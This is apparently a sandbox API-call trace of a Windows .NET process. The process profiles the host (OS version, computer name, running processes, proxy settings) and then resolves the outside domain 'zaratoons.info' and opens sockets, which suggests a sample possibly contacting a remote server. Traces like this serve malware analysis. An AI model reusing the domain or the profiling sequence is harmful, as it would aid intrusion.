	[0726.683] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3b0
	[0726.691] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c77d198 | out: TokenHandle=0x1c77d198*=0x374) returned 1
	[0726.693] GetCurrentProcess () returned 0xffffffffffffffff
	[0726.693] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c77d198 | out: TokenHandle=0x1c77d198*=0x398) returned 1
	[0728.313] GetCurrentProcess () returned 0xffffffffffffffff
	[0728.314] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c77d0d8 | out: TokenHandle=0x1c77d0d8*=0x39c) returned 1
	[0728.325] GetCurrentProcess () returned 0xffffffffffffffff
	[0728.325] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c77d0d8 | out: TokenHandle=0x1c77d0d8*=0x394) returned 1
	[0728.329] GetCurrentProcess () returned 0xffffffffffffffff
	[0728.329] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c77d718 | out: TokenHandle=0x1c77d718*=0x3b8) returned 1
	[0728.344] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c77b7d8 | out: phkResult=0x1c77b7d8*=0x3bc) returned 0x0
	[0728.344] RegQueryValueExW (in: hKey=0x3bc, lpValueName="InstallationType", lpReserved=0x0, lpType=0x1c77b75c, lpData=0x0, lpcbData=0x1c77b758*=0x0 | out: lpType=0x1c77b75c*=0x1, lpData=0x0, lpcbData=0x1c77b758*=0xe) returned 0x0
	[0728.344] CoTaskMemAlloc (cb=0x12) returned 0x1b923d80
	[0728.344] RegQueryValueExW (in: hKey=0x3bc, lpValueName="InstallationType", lpReserved=0x0, lpType=0x1c77b72c, lpData=0x1b923d80, lpcbData=0x1c77b728*=0xe | out: lpType=0x1c77b72c*=0x1, lpData="Client", lpcbData=0x1c77b728*=0xe) returned 0x0
	[0728.344] CoTaskMemFree (pv=0x1b923d80) 
	[0728.344] RegCloseKey (hKey=0x3bc) returned 0x0
	[0730.296] CoTaskMemAlloc (cb=0xcd0) returned 0x1b929dd0
	[0730.296] RasEnumConnectionsW (in: param_1=0x1b929dd0, param_2=0x1c77d76c, param_3=0x1c77d768 | out: param_1=0x1b929dd0, param_2=0x1c77d76c, param_3=0x1c77d768) returned 0x0
	[0730.301] CoTaskMemFree (pv=0x1b929dd0) 
	[0730.307] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x1c77d578 | out: lpWSAData=0x1c77d578) returned 0
	[0730.316] WSASocketW (af=2, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x0) returned 0x408
	[0732.097] setsockopt (s=0x408, level=65535, optname=128, optval="\x01", optlen=4) returned -1
	[0732.097] closesocket (s=0x408) returned 0
	[0732.097] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x0) returned 0x408
	[0732.100] setsockopt (s=0x408, level=65535, optname=128, optval="\x01", optlen=4) returned -1
	[0732.100] closesocket (s=0x408) returned 0
	[0732.108] GetCurrentProcess () returned 0xffffffffffffffff
	[0732.108] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c77cdf8 | out: TokenHandle=0x1c77cdf8*=0x408) returned 1
	[0732.121] GetCurrentProcess () returned 0xffffffffffffffff
	[0732.121] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c77cdf8 | out: TokenHandle=0x1c77cdf8*=0x40c) returned 1
	[0733.546] GetCurrentProcessId () returned 0xf18
	[0733.555] CoTaskMemAlloc (cb=0x204) returned 0x41a520
	[0733.555] GetComputerNameW (in: lpBuffer=0x41a520, nSize=0x2fbd518 | out: lpBuffer="XDUWTFONO", nSize=0x2fbd518) returned 1
	[0733.555] CoTaskMemFree (pv=0x41a520) 
	[0733.556] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\.NET CLR Networking\\Performance", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c77d2d8 | out: phkResult=0x1c77d2d8*=0x410) returned 0x0
	[0733.556] RegQueryValueExW (in: hKey=0x410, lpValueName="Library", lpReserved=0x0, lpType=0x1c77d25c, lpData=0x0, lpcbData=0x1c77d258*=0x0 | out: lpType=0x1c77d25c*=0x1, lpData=0x0, lpcbData=0x1c77d258*=0x1c) returned 0x0
	[0733.556] CoTaskMemAlloc (cb=0x20) returned 0x1b91f980
	[0733.556] RegQueryValueExW (in: hKey=0x410, lpValueName="Library", lpReserved=0x0, lpType=0x1c77d22c, lpData=0x1b91f980, lpcbData=0x1c77d228*=0x1c | out: lpType=0x1c77d22c*=0x1, lpData="netfxperf.dll", lpcbData=0x1c77d228*=0x1c) returned 0x0
	[0733.556] CoTaskMemFree (pv=0x1b91f980) 
	[0733.556] RegQueryValueExW (in: hKey=0x410, lpValueName="IsMultiInstance", lpReserved=0x0, lpType=0x1c77d25c, lpData=0x0, lpcbData=0x1c77d258*=0x0 | out: lpType=0x1c77d25c*=0x4, lpData=0x0, lpcbData=0x1c77d258*=0x4) returned 0x0
	[0733.557] RegQueryValueExW (in: hKey=0x410, lpValueName="IsMultiInstance", lpReserved=0x0, lpType=0x1c77d260, lpData=0x1c77d25c, lpcbData=0x1c77d258*=0x4 | out: lpType=0x1c77d260*=0x4, lpData=0x1c77d25c*=0x1, lpcbData=0x1c77d258*=0x4) returned 0x0
	[0733.557] RegQueryValueExW (in: hKey=0x410, lpValueName="First Counter", lpReserved=0x0, lpType=0x1c77d25c, lpData=0x0, lpcbData=0x1c77d258*=0x0 | out: lpType=0x1c77d25c*=0x4, lpData=0x0, lpcbData=0x1c77d258*=0x4) returned 0x0
	[0733.558] RegQueryValueExW (in: hKey=0x410, lpValueName="First Counter", lpReserved=0x0, lpType=0x1c77d260, lpData=0x1c77d25c, lpcbData=0x1c77d258*=0x4 | out: lpType=0x1c77d260*=0x4, lpData=0x1c77d25c*=0x137a, lpcbData=0x1c77d258*=0x4) returned 0x0
	[0733.558] RegCloseKey (hKey=0x410) returned 0x0
	[0733.561] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\.net clr networking\\Performance", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c77d298 | out: phkResult=0x1c77d298*=0x410) returned 0x0
	[0733.561] RegQueryValueExW (in: hKey=0x410, lpValueName="CategoryOptions", lpReserved=0x0, lpType=0x1c77d21c, lpData=0x0, lpcbData=0x1c77d218*=0x0 | out: lpType=0x1c77d21c*=0x4, lpData=0x0, lpcbData=0x1c77d218*=0x4) returned 0x0
	[0733.561] RegQueryValueExW (in: hKey=0x410, lpValueName="CategoryOptions", lpReserved=0x0, lpType=0x1c77d220, lpData=0x1c77d21c, lpcbData=0x1c77d218*=0x4 | out: lpType=0x1c77d220*=0x4, lpData=0x1c77d21c*=0x3, lpcbData=0x1c77d218*=0x4) returned 0x0
	[0733.562] RegQueryValueExW (in: hKey=0x410, lpValueName="FileMappingSize", lpReserved=0x0, lpType=0x1c77d21c, lpData=0x0, lpcbData=0x1c77d218*=0x0 | out: lpType=0x1c77d21c*=0x4, lpData=0x0, lpcbData=0x1c77d218*=0x4) returned 0x0
	[0733.562] RegQueryValueExW (in: hKey=0x410, lpValueName="FileMappingSize", lpReserved=0x0, lpType=0x1c77d220, lpData=0x1c77d21c, lpcbData=0x1c77d218*=0x4 | out: lpType=0x1c77d220*=0x4, lpData=0x1c77d21c*=0x20000, lpcbData=0x1c77d218*=0x4) returned 0x0
	[0733.562] RegQueryValueExW (in: hKey=0x410, lpValueName="Counter Names", lpReserved=0x0, lpType=0x1c77d21c, lpData=0x0, lpcbData=0x1c77d218*=0x0 | out: lpType=0x1c77d21c*=0x3, lpData=0x0, lpcbData=0x1c77d218*=0xaa) returned 0x0
	[0733.562] RegQueryValueExW (in: hKey=0x410, lpValueName="Counter Names", lpReserved=0x0, lpType=0x1c77d21c, lpData=0x2fc0808, lpcbData=0x1c77d218*=0xaa | out: lpType=0x1c77d21c*=0x3, lpData=0x2fc0808*, lpcbData=0x1c77d218*=0xaa) returned 0x0
	[0733.566] ConvertStringSecurityDescriptorToSecurityDescriptorW () returned 0x1
	[0733.570] CreateFileMappingW (hFile=0xffffffffffffffff, lpFileMappingAttributes=0x1c77d1d0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x20000, lpName="Global\\netfxcustomperfcounters.1.0.net clr networking") returned 0x0
	[0733.571] OpenFileMappingW (dwDesiredAccess=0x2, bInheritHandle=0, lpName="Global\\netfxcustomperfcounters.1.0.net clr networking") returned 0x418
	[0733.573] MapViewOfFile (hFileMappingObject=0x418, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x2190000
	[0733.575] VirtualQuery (in: lpAddress=0x2190000, lpBuffer=0x1c77d1c8, dwLength=0x30 | out: lpBuffer=0x1c77d1c8*(BaseAddress=0x2190000, AllocationBase=0x2190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x20000, State=0x1000, Protect=0x4, Type=0x40000, __alignment2=0x0)) returned 0x30
	[0733.575] LocalFree (hMem=0x1b927110) returned 0x0
	[0733.576] RegCloseKey (hKey=0x410) returned 0x0
	[0734.861] GetVersionExW (in: lpVersionInformation=0x1c77c1a0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1c77c1a0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0734.862] GetVersionExW (in: lpVersionInformation=0x1c77c170*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1c77c170*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0734.863] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2fc14d8, cbSid=0x1c77d1b0 | out: pSid=0x2fc14d8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c77d1b0) returned 1
	[0734.866] CreateMutexW (lpMutexAttributes=0x2fc16e0, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x410
	[0734.869] WaitForSingleObject (hHandle=0x410, dwMilliseconds=0x1f4) returned 0x0
	[0734.870] GetCurrentProcessId () returned 0xf18
	[0734.871] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf18) returned 0x41c
	[0734.872] GetProcessTimes (in: hProcess=0x41c, lpCreationTime=0x1c77d0c0, lpExitTime=0x1c77d0b8, lpKernelTime=0x1c77d0b0, lpUserTime=0x1c77d0a8 | out: lpCreationTime=0x1c77d0c0, lpExitTime=0x1c77d0b8, lpKernelTime=0x1c77d0b0, lpUserTime=0x1c77d0a8) returned 1
	[0734.872] CloseHandle (hObject=0x41c) returned 1
	[0734.872] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf64) returned 0x41c
	[0734.873] GetProcessTimes (in: hProcess=0x41c, lpCreationTime=0x1c77d150, lpExitTime=0x1c77d148, lpKernelTime=0x1c77d140, lpUserTime=0x1c77d138 | out: lpCreationTime=0x1c77d150, lpExitTime=0x1c77d148, lpKernelTime=0x1c77d140, lpUserTime=0x1c77d138) returned 1
	[0734.873] CloseHandle (hObject=0x41c) returned 1
	[0734.873] OpenProcess (dwDesiredAccess=0x100000, bInheritHandle=0, dwProcessId=0xf64) returned 0x41c
	[0734.874] GetCurrentProcess () returned 0xffffffffffffffff
	[0734.874] GetCurrentProcess () returned 0xffffffffffffffff
	[0734.875] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x41c, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c77d0a8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c77d0a8*=0x420) returned 1
	[0734.876] CloseHandle (hObject=0x420) returned 1
	[0734.876] CloseHandle (hObject=0x41c) returned 1
	[0734.877] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf38) returned 0x41c
	[0734.877] GetProcessTimes (in: hProcess=0x41c, lpCreationTime=0x1c77d150, lpExitTime=0x1c77d148, lpKernelTime=0x1c77d140, lpUserTime=0x1c77d138 | out: lpCreationTime=0x1c77d150, lpExitTime=0x1c77d148, lpKernelTime=0x1c77d140, lpUserTime=0x1c77d138) returned 1
	[0734.877] CloseHandle (hObject=0x41c) returned 1
	[0734.877] OpenProcess (dwDesiredAccess=0x100000, bInheritHandle=0, dwProcessId=0xf38) returned 0x41c
	[0734.877] GetCurrentProcess () returned 0xffffffffffffffff
	[0734.877] GetCurrentProcess () returned 0xffffffffffffffff
	[0734.877] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x41c, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c77d0a8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c77d0a8*=0x420) returned 1
	[0734.878] CloseHandle (hObject=0x420) returned 1
	[0734.878] CloseHandle (hObject=0x41c) returned 1
	[0734.878] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf6c) returned 0x41c
	[0734.878] GetProcessTimes (in: hProcess=0x41c, lpCreationTime=0x1c77d150, lpExitTime=0x1c77d148, lpKernelTime=0x1c77d140, lpUserTime=0x1c77d138 | out: lpCreationTime=0x1c77d150, lpExitTime=0x1c77d148, lpKernelTime=0x1c77d140, lpUserTime=0x1c77d138) returned 1
	[0734.878] CloseHandle (hObject=0x41c) returned 1
	[0734.878] OpenProcess (dwDesiredAccess=0x100000, bInheritHandle=0, dwProcessId=0xf6c) returned 0x41c
	[0734.878] GetCurrentProcess () returned 0xffffffffffffffff
	[0734.878] GetCurrentProcess () returned 0xffffffffffffffff
	[0734.878] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x41c, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c77d0a8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c77d0a8*=0x420) returned 1
	[0734.879] CloseHandle (hObject=0x420) returned 1
	[0734.879] CloseHandle (hObject=0x41c) returned 1
	[0734.879] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf54) returned 0x41c
	[0734.879] GetProcessTimes (in: hProcess=0x41c, lpCreationTime=0x1c77d150, lpExitTime=0x1c77d148, lpKernelTime=0x1c77d140, lpUserTime=0x1c77d138 | out: lpCreationTime=0x1c77d150, lpExitTime=0x1c77d148, lpKernelTime=0x1c77d140, lpUserTime=0x1c77d138) returned 1
	[0734.879] CloseHandle (hObject=0x41c) returned 1
	[0734.879] OpenProcess (dwDesiredAccess=0x100000, bInheritHandle=0, dwProcessId=0xf54) returned 0x41c
	[0734.880] GetCurrentProcess () returned 0xffffffffffffffff
	[0734.880] GetCurrentProcess () returned 0xffffffffffffffff
	[0734.880] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x41c, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c77d0a8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c77d0a8*=0x420) returned 1
	[0734.880] CloseHandle (hObject=0x420) returned 1
	[0734.880] CloseHandle (hObject=0x41c) returned 1
	[0734.882] ReleaseMutex (hMutex=0x410) returned 1
	[0734.882] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2fc2730, cbSid=0x1c77d1b0 | out: pSid=0x2fc2730*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c77d1b0) returned 1
	[0734.882] CreateMutexW (lpMutexAttributes=0x2fc28e8, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x410
	[0734.883] ReleaseMutex (hMutex=0x410) returned 1
	[0734.883] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2fc3558, cbSid=0x1c77d1b0 | out: pSid=0x2fc3558*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c77d1b0) returned 1
	[0734.883] CreateMutexW (lpMutexAttributes=0x2fc3710, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x410
	[0734.884] ReleaseMutex (hMutex=0x410) returned 1
	[0734.884] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2fc4390, cbSid=0x1c77d1b0 | out: pSid=0x2fc4390*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c77d1b0) returned 1
	[0734.884] CreateMutexW (lpMutexAttributes=0x2fc4548, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x410
	[0734.885] ReleaseMutex (hMutex=0x410) returned 1
	[0734.885] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2fc51c0, cbSid=0x1c77d1b0 | out: pSid=0x2fc51c0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c77d1b0) returned 1
	[0734.886] CreateMutexW (lpMutexAttributes=0x2fc5378, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x410
	[0734.886] ReleaseMutex (hMutex=0x410) returned 1
	[0734.887] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2fc5ff0, cbSid=0x1c77d160 | out: pSid=0x2fc5ff0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c77d160) returned 1
	[0734.887] CreateMutexW (lpMutexAttributes=0x2fc61a8, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x410
	[0734.888] ReleaseMutex (hMutex=0x410) returned 1
	[0734.888] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2fc6e10, cbSid=0x1c77d160 | out: pSid=0x2fc6e10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c77d160) returned 1
	[0734.888] CreateMutexW (lpMutexAttributes=0x2fc6fc8, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x410
	[0734.889] ReleaseMutex (hMutex=0x410) returned 1
	[0734.889] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2fc7c28, cbSid=0x1c77d160 | out: pSid=0x2fc7c28*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c77d160) returned 1
	[0734.889] CreateMutexW (lpMutexAttributes=0x2fc7de0, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x410
	[0734.898] ReleaseMutex (hMutex=0x410) returned 1
	[0734.898] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2fc8a50, cbSid=0x1c77d160 | out: pSid=0x2fc8a50*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c77d160) returned 1
	[0734.899] CreateMutexW (lpMutexAttributes=0x2fc8c08, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x410
	[0734.899] ReleaseMutex (hMutex=0x410) returned 1
	[0734.900] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2fc9870, cbSid=0x1c77d160 | out: pSid=0x2fc9870*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c77d160) returned 1
	[0734.900] CreateMutexW (lpMutexAttributes=0x2fc9a28, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x410
	[0734.900] ReleaseMutex (hMutex=0x410) returned 1
	[0737.606] WSASocketW (af=2, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x410
	[0737.607] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x41c
	[0737.607] ioctlsocket (in: s=0x410, cmd=-2147195266, argp=0x1c77d798 | out: argp=0x1c77d798) returned 0
	[0737.608] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x420
	[0737.608] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x424
	[0737.608] ioctlsocket (in: s=0x420, cmd=-2147195266, argp=0x1c77d798 | out: argp=0x1c77d798) returned 0
	[0737.609] WSAIoctl (in: s=0x410, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x1c77d710, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x1c77d710, lpOverlapped=0x0) returned -1
	[0737.610] CoTaskMemAlloc (cb=0x204) returned 0x41a310
	[0737.610] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x41a310, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45
	[0739.122] CoTaskMemFree (pv=0x41a310) 
	[0739.123] WSAEventSelect (s=0x410, hEventObject=0x41c, lNetworkEvents=512) returned 0
	[0739.123] WSAIoctl (in: s=0x420, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x1c77d710, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x1c77d710, lpOverlapped=0x0) returned -1
	[0739.123] CoTaskMemAlloc (cb=0x204) returned 0x41a310
	[0739.123] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x41a310, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45
	[0739.123] CoTaskMemFree (pv=0x41a310) 
	[0739.123] WSAEventSelect (s=0x420, hEventObject=0x424, lNetworkEvents=512) returned 0
	[0739.123] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x428
	[0739.124] RasConnectionNotificationW (param_1=0xffffffffffffffff, param_2=0x428, param_3=0x3) returned 0x0
	[0739.130] RegOpenCurrentUser (in: samDesired=0x20019, phkResult=0x1c77d850 | out: phkResult=0x1c77d850*=0x440) returned 0x0
	[0739.132] RegOpenKeyExW (in: hKey=0x440, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c77d738 | out: phkResult=0x1c77d738*=0x444) returned 0x0
	[0739.132] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x448
	[0739.133] RegNotifyChangeKeyValue (hKey=0x444, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x448, fAsynchronous=1) returned 0x0
	[0739.134] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c77d760 | out: phkResult=0x1c77d760*=0x44c) returned 0x0
	[0739.134] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x450
	[0739.134] RegNotifyChangeKeyValue (hKey=0x44c, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x450, fAsynchronous=1) returned 0x0
	[0739.134] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c77d760 | out: phkResult=0x1c77d760*=0x454) returned 0x0
	[0739.134] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x458
	[0739.134] RegNotifyChangeKeyValue (hKey=0x454, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x458, fAsynchronous=1) returned 0x0
	[0739.135] GetCurrentProcess () returned 0xffffffffffffffff
	[0739.135] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c77d6c8 | out: TokenHandle=0x1c77d6c8*=0x45c) returned 1
	[0739.142] GetCurrentProcess () returned 0xffffffffffffffff
	[0739.142] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c77ce98 | out: TokenHandle=0x1c77ce98*=0x460) returned 1
	[0739.147] GetCurrentProcess () returned 0xffffffffffffffff
	[0739.148] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c77ce98 | out: TokenHandle=0x1c77ce98*=0x464) returned 1
	[0747.592] WinHttpGetIEProxyConfigForCurrentUser (in: pProxyConfig=0x1c77d798 | out: pProxyConfig=0x1c77d798) returned 1
	[0750.833] SetEvent (hEvent=0x390) returned 1
	[0756.449] GetCurrentProcess () returned 0xffffffffffffffff
	[0756.449] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c77cf08 | out: TokenHandle=0x1c77cf08*=0x4bc) returned 1
	[0756.453] GetCurrentProcess () returned 0xffffffffffffffff
	[0756.453] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c77cf08 | out: TokenHandle=0x1c77cf08*=0x4c0) returned 1
	[0757.863] SetEvent (hEvent=0x390) returned 1
	[0765.129] GetNetworkParams (in: pFixedInfo=0x0, pOutBufLen=0x1c77d3d8 | out: pFixedInfo=0x0, pOutBufLen=0x1c77d3d8) returned 0x6f
	[0772.019] LocalAlloc (uFlags=0x0, uBytes=0x258) returned 0x1b94dce0
	[0772.019] GetNetworkParams (in: pFixedInfo=0x1b94dce0, pOutBufLen=0x1c77d3d8 | out: pFixedInfo=0x1b94dce0, pOutBufLen=0x1c77d3d8) returned 0x0
	[0778.750] CoTaskMemAlloc (cb=0xd) returned 0x1b93c590
	[0778.750] inet_addr (cp="192.168.0.1") returned 0x100a8c0
	[0778.750] CoTaskMemFree (pv=0x1b93c590) 
	[0778.753] LocalFree (hMem=0x1b94dce0) returned 0x0
	[0779.659] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x4d4
	[0779.661] CoTaskMemAlloc (cb=0x10) returned 0x1b93c590
	[0779.663] getaddrinfo (in: pNodeName="zaratoons.info", pServiceName=0x0, pHints=0x1c77d380*(ai_flags=2, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x1c77d378 | out: ppResult=0x1c77d378*=0x1b946e20*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="zaratoons.info", ai_addr=0x1b93c5f0*(sa_family=2, sin_port=0x0, sin_addr="212.73.150.207"), ai_next=0x0)) returned 0
	[0784.271] CoTaskMemFree (pv=0x1b93c590) 
	[0784.271] CoTaskMemFree (pv=0x0) 
	[0784.276] WSASocketW (af=2, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x4e4
	[0784.276] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x4dc
